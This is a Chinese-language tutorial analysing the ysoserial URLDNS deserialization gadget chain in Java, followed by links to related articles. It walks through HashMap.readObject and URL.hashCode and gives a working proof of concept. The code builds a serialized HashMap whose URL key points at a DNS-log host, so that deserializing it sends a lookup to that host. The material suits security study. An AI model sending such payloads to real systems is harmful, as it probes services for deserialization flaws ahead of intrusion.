java 安全ysoserial URLDNS利用链分析

目录
  • JAVA序列化和反序列化的基本概念
    • 序列化和反序列化的类
  • 简单测试
    • 重写的readobject方法
    • 分析URLDNS的利用链
    • 方法中遍历key值执行putVal方法
      • 触发:URL类中的hashCode方法
      • 触发DNS请求:

JAVA序列化和反序列化的基本概念

在分析URLDNS之前,必须了解JAVA序列化和反序列化的基本概念。

其中几个重要的概念:

需要让某个对象支持序列化机制,就必须让其类是可序列化,为了让某类可序列化的,该类就必须实现如下两个接口之一:

Serializable:标记接口,没有方法

Externalizable:该接口有方法需要实现,一般不用这种

序列化对象时,默认将里面所有属性都进行序列化,但除了static或transient修饰的成员。

序列化具备可继承性,也就是如果某类已经实现了序列化,则它的所有子类也已经默认实现了序列化。

序列化和反序列化的类

ObjectOutputStream:提供序列化功能

ObjectInputStream:提供反序列化功能

序列化方法:

.writeObject()

反序列化方法:

.readObject()

既然反序列化方法.readObject(),所以通常会在类中重写该方法,为实现反序列化的时候自动执行。

简单测试

public class Urldns implements Serializable {
    public static void main(String[] args) throws Exception {
        Urldns urldns = new Urldns();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("d:\\urldns.txt"));
        objectOutputStream.writeObject(urldns);
    }
    public void run(){
        System.out.println("urldns run");
    }
    private void readObject(ObjectInputStream s) throws IOException, ClassNotFoundException {
        System.out.println("urldns readObject");
        s.defaultReadObject();
    }
}

重写的readobject方法

对这个测试类Urldns做序列化后,反序列化的时候执行了重写的readobject方法。

import java.io.*;
public class Serializable_run implements Serializable{
    public void run(ObjectInputStream s) throws IOException, ClassNotFoundException {
        s.readObject();
    }
    public static void main(String[] args) throws Exception {
        Serializable_run serializable_run = new Serializable_run();
        serializable_run.run(new ObjectInputStream(new FileInputStream("d:\\urldns.txt")));
    }
}

所以只要对readobject方法做重写就可以实现在反序列化该类的时候得到执行。

分析URLDNS的利用链

利用链的思路大致如此,那么分析URLDNS的利用链。

public Object getObject(final String url) throws Exception {
                //Avoid DNS resolution during payload creation
                //Since the field <code>java.net.URL.handler</code> is transient, it will not be part of the serialized payload.
                URLStreamHandler handler = new SilentURLStreamHandler();
                HashMap ht = new HashMap(); // HashMap that will contain the URL
                URL u = new URL(null, url, handler); // URL to use as the Key
                ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
                Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.
                return ht;
        }

该类实际返回HashMap类型,但是HashMap用来用来存储数据的数组是transient,序列化时忽略数据。

因为HashMap重写了writeobject方法,在writeobject实现了对数据的序列化。

还存在重写readobject方法,那么分析readobject中的内容。

方法中遍历key值执行putVal方法

private void readObject(java.io.ObjectInputStream s)
        throws IOException, ClassNotFoundException {
        // Read in the threshold (ignored), loadfactor, and any hidden stuff
        s.defaultReadObject();
        reinitialize();
        if (loadFactor <= 0 || Float.isNaN(loadFactor))
            throw new InvalidObjectException("Illegal load factor: " +
                                             loadFactor);
        s.readInt();                // Read and ignore number of buckets
        int mappings = s.readInt(); // Read number of mappings (size)
        if (mappings < 0)
            throw new InvalidObjectException("Illegal mappings count: " +
                                             mappings);
        else if (mappings > 0) { // (if zero, use defaults)
            // Size the table using given load factor only if within
            // range of 0.25...4.0
            float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
            float fc = (float)mappings / lf + 1.0f;
            int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
                       DEFAULT_INITIAL_CAPACITY :
                       (fc >= MAXIMUM_CAPACITY) ?
                       MAXIMUM_CAPACITY :
                       tableSizeFor((int)fc));
            float ft = (float)cap * lf;
            threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
                         (int)ft : Integer.MAX_VALUE);
            // Check Map.Entry[].class since it's the nearest public type to
            // what we're actually creating.
            SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, cap);
            @SuppressWarnings({"rawtypes","unchecked"})
            Node<K,V>[] tab = (Node<K,V>[])new Node[cap];
            table = tab;
            // Read the keys and values, and put the mappings in the HashMap
            for (int i = 0; i < mappings; i++) {
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }
        }
    }

触发:

putVal(hash(key), key, value, false, false);

触发:

static final int hash(Object key) {
    int h;
    return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

这里的key对象如果是URL对象,那么就

触发:URL类中的hashCode方法

public synchronized int hashCode() {
    if (hashCode != -1)
        return hashCode;
    hashCode = handler.hashCode(this);
    return hashCode;
}

触发DNS请求:

public synchronized int hashCode() {
        if (hashCode != -1)
            return hashCode;
        hashCode = handler.hashCode(this);
        return hashCode;
    }
protected synchronized InetAddress getHostAddress(URL u) {
        if (u.hostAddress != null)
            return u.hostAddress;
        String host = u.getHost();
        if (host == null || host.equals("")) {
            return null;
        } else {
            try {
                u.hostAddress = InetAddress.getByName(host);
            } catch (UnknownHostException ex) {
                return null;
            } catch (SecurityException se) {
                return null;
            }
        }
        return u.hostAddress;
    }

在hashCode=-1的时候,可以触发DNS请求,而hashCode私有属性默认值为-1。

所以为了实现readobject方法的DNS请求,接下来要做的是:

1、制造一个HashMap对象,且key值为URL对象;

2、保持私有属性hashcode为-1;

所以构造DNS请求的HashMap对象内容应该是:

public class Urldns implements Serializable {
    public static void main(String[] args) throws Exception {
        HashMap map = new HashMap();
        URL url = new URL("http://ixw9i.8n6xsg.dnslogimalloc.xyz");
        Class<?> aClass = Class.forName("java.net.URL");
        Field hashCode = aClass.getDeclaredField("hashCode");
        hashCode.setAccessible(true);
        hashCode.set(url,1);
        map.put(url, "xzjhlk");
        hashCode.set(url,-1);
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("d:\\urldns.txt"));
        objectOutputStream.writeObject(map);
    }
}

至于为什么在序列化的时候要通过反射将url对象中的hashCode属性稍微非-1,是因为hashCode的put方法也实际调用的是putVal(hash(key), key, value, false, true);

这个过程将触发一次DNS请求。

以上就是java 安全ysoserial URLDNS利用链分析的详细内容,更多关于java 安全 ysoserial URLDNS的资料请关注我们其它相关文章!

(0)

相关推荐

  • Java安全 ysoserial CommonsCollections3示例分析

    目录 cc3利用链如下: 一.为构造的恶意字节码文件找一个newInstance启动入口 构造恶意类: 加载的字节码类需要继承AbstractTranslet 二.将字节码内容直接赋值序列化 三.让newTransformer得到执行 cc3利用链如下: TrAXFilter(Templates templates) TemplatesImpl->newTransformer() TemplatesImpl->getTransletInstance() _class[_transletInde

  • java安全之CommonsCollections4详解

    目录 引子 PriorityQueue readobject()方法 heapify()调用了siftdown()方法 TransformingComparator 问题 POC 结语 引子 CC4简单来说就是CC3前半部分和CC2后半部分拼接组成的,对于其利用的限制条件与CC2一致,一样需要在commons-collections-4.0版本使用,原因是TransformingComparator类在3.1-3.2.1版本中还没有实现Serializable接口,无法被反序列化. 接下来让我们

  • Java中Map实现线程安全的3种方式

    目录 方式1. 使用Hashtable 方式2. 使用Collections.synchronizedMap(newHashtable()) 方式3. 使用ConcurrentHashMap 方式1.  使用Hashtable Map<String,Object> hashtable=new Hashtable<String,Object>(); 这是所有人最先想到的,那为什么它是线程安全的?那就看看它的源码,我们可以看出我们常用的put,get,containsKey等方法都是同

  • 深入探究Java线程不安全的原因与解决

    目录 一.什么是线程安全 二.线程不安全的原因 1.修改共享数据 2.原子性 3.内存可见性 4.指令重排序 三.解决线程安全方案 一.什么是线程安全 想给出一个线程安全的确切定义是复杂的,但我们可以这样认为: 如果多线程环境下代码运行的结果是符合我们预期的,即在单线程环境应该的结果,则说这个程序是线程安全的 二.线程不安全的原因 1.修改共享数据 static class Counter { public int count = 0; void increase() { count++; }

  • Java双重MD5加密实现安全登录

    目录 一:问题引入 二:解决方案 2.1:第一次加密 2.2:第二次加密 三:代码实现 3.1:第一次加密 3.2:第二次加密 一:问题引入 今天看到一篇文章说使用MD5对密码进行加密存储也还不能做到很安全,网上有在线解密MD5的网站,我一搜,还真有.接下来我尝试对我存储在数据库中的密码进行解密操作: 可以看到成功将我的密码解密出来,这让我很吃惊,因为我们都知道MD5算法是不可逆的,因为它是其是一种散列函数,使用的是hash算法,在计算过程中原文的部分信息是丢失了的.那么为什么网站中可以将我的密

  • java安全 ysoserial CommonsCollections1示例解析

    目录 正文 先假设Runtime类可序列化 调用InvokerTransformer.transform() InvokerTransformer的transform调用 ChainedTransformer的transform谁来调? lazyMap的get谁来调用? AnnotationInvocationHandler的readobject重写 正文 /* Gadget chain: ObjectInputStream.readObject() AnnotationInvocationHa

  • java 安全ysoserial URLDNS利用链分析

    目录 JAVA序列化和反序列化的基本概念 序列化和反序列化的类 简单测试 重写的readobject方法 分析URLDNS的利用链 方法中遍历key值执行putVal方法 触发:URL类中的hashCode方法 触发DNS请求: JAVA序列化和反序列化的基本概念 在分析URLDNS之前,必须了解JAVA序列化和反序列化的基本概念. 其中几个重要的概念: 需要让某个对象支持序列化机制,就必须让其类是可序列化,为了让某类可序列化的,该类就必须实现如下两个接口之一: Serializable:标记接

  • java 安全 ysoserial CommonsCollections6 分析

    目录 利用链如下 1.InvokerTransformer.transform() 2.ChainedTransformer.transform() 3.LazyMap.get() 4.TiedMapEntry 5.HashMap 6.HashSet 利用链如下 其中LazyMap.get()->ChainedTransformer.transform()-InvokerTransformer.transform()与CC1链一致. /* Gadget chain: java.io.Object

  • Java安全 ysoserial CommonsCollections2示例分析

    目录 正文 cc2 commons-collections4版本利用链 InvokerTransformer.transform()利用 InvokerTransformer.transform()的调用 TransformingComparator.compare()的调用 queue属性赋值 最终完整利用实现 正文 在最后一步的实现上,cc2和cc3一样,最终都是通过TemplatesImpl恶意字节码文件动态加载方式实现反序列化. 已知的TemplatesImpl->newTransfor

  • Java与Node.js利用AES加密解密出相同结果的方法示例

    前言 工作中遇到nodejs端通过aes加密,安卓客户端Java解密,同样nodejs也需要解密安卓客户端加密过来的内容,发现两个加密结果不一样,查询资料发现java端需要对密钥再MD5加密一遍,以下是Java与Node.js利用AES加密解密出相同结果的方法,需要的朋友们下面来一起学习学习吧. JAVA代码如下: package g.g; import java.security.MessageDigest; import javax.crypto.Cipher; import javax.c

  • Java 自定义注解及利用反射读取注解的实例

    一.自定义注解 元注解: @interface注解: 定义注解接口 @Target注解: 用于约束被描述的注解的使用范围,当被描述的注解超出使用范围则编译失败.如:ElementType.METHOD,ElementType.TYPE: @Retention 注解:用于约束被定义注解的作用范围,作用范围有三个: 1.RetentionPolicy.SOURCE:作用范围是源码,作用于Java文件中,当执行javac时去除该注解. 2.RetentionPolicy.CLASS:作用范围是二进制码

  • Java爬虫实现Jsoup利用dom方法遍历Document对象

    先给出网页地址: https://wall.alphacoders.com/featured.php?lang=Chinese 主要步骤: 利用Jsoup的connect方法获取Document对象 String html = "https://wall.alphacoders.com/featured.php?lang=Chinese"; Document doc = Jsoup.connect(html).get(); 内容过长,就不再显示. 我们以这部分为例: <ul cl

  • Java Web程序中利用Spring框架返回JSON格式的日期

    返回Json时格式化日期Date 第一步:创建CustomObjectMapper类 /** * 解决SpringMVC使用@ResponseBody返回json时,日期格式默认显示为时间戳的问题.需配合<mvc:message-converters>使用 */ @Component("customObjectMapper") public class CustomObjectMapper extends ObjectMapper { public CustomObject

  • java利用Socket实现聊天室功能实例

    最近研究了下Java socket通信基础,利用代码实现了一个简单的多人聊天室功能,现把代码共享下,希望能帮到有兴趣了解的人. 目录结构: ChatClient: package com.panda.chat; import java.awt.*; import java.awt.event.*; import java.io.*; import java.net.*; @SuppressWarnings("serial") public class ChatClient extend

  • Java RandomAccessFile的用法详解

    RandomAccessFile RandomAccessFile是用来访问那些保存数据记录的文件的,你就可以用seek( )方法来访问记录,并进行读写了.这些记录的大小不必相同:但是其大小和位置必须是可知的.但是该类仅限于操作文件. RandomAccessFile不属于InputStream和OutputStream类系的.实际上,除了实现DataInput和 DataOutput接口之外(DataInputStream和DataOutputStream也实现了这两个接口),它和这两个类系毫

随机推荐